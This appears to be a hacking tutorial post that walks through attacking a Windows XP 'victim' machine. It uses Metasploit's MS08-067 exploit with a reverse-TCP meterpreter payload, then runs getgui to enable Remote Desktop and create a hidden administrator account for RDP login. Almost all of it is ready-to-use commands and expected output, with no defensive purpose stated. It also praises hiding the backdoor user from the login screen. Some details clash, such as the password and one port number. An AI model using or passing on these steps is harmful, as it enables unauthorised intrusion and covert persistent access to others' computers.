RDP To Victim

Follow this steps, to create an rdp user on your victim’s machine

#1) Open terminal & type:
assault@hackbook:~$ sudo msfconsole
*Inside msf console type*
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit (ms_08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
*The output will be: PAYLOAD => windows/meterpreter/reverse_tcp*

*Now, Set The Local Host – hacker’s local ip address*
msf exploit (ms_08_067_netapi) > set LHOST 192.168.50.15
*The output will be: LHOST => 192.168.50.15*

*Now, Set The Remote Host – target’s local ip address*
msf exploit (ms_08_067_netapi) > set RHOST 192.168.50.7
*The output will be: RHOST => 192.168.50.7*

*Now, Set The LPORT & RPORT*
msf exploit (ms_08_067_netapi) > set LPORT 4444
LPORT => 4444
msf exploit (ms_08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit (ms_08_067_netapi) > show options
*Here we will get the whole details about our exploit process*

Now, let’s make it work. Let’s type:
msf exploit (ms_08_067_netapi) > exploit

*And you will get this output*
[*] Started reverse handler on 192.168.50.15:4444
[*] Automatically detecting the target…
[*] Fingerprinting: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability …
[*] Sending stage (885806 bytes) to 192.168.50.7
[*] Meterpreter session 1 opened (192.168.50.15:444 -> 192.168.50.7:1045) at 2015-10.11 14:20:19 +0300

meterpreter > run getgui -e
*You will get this output*
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enable Remote Desktop
[*] ——RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] —-Terminal Services server is already set to auto
[*] —-Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scri
pst/getgui/clean_up__20151112.1556.rc

*Let’s continue*
meterpreter > run getgui -u yesigotyou -p try2hackme
*You will get this output*
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*] —-Adding User: yesigotyou with password: try2hack
[*] —-Hiding user: from windows login screen
[*] —-Adding User: yesigotyou to local group ‘Remote Desktop Users’
[*] —-Adding User: yesigotyou to local group ‘Administrators’
[*] You can now login with the screated user
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scri
pst/getgui/clean_up__20151112.1556.rc

meterpreter >

 

[LET’S RDP]
#1) Open terminal & type:
tux@kali:~$ sudo rdesktop -u yesigotyou -p try2hack 192.168.50.7
*The value -u means user, and the value -p means password*

 

P.S: look at the 2nd output, this is the most important thing during the attack process:
[*] Hiding user: from windows login screen

 

ENJOY! 🙂

 

Here is an example by Gamer Forever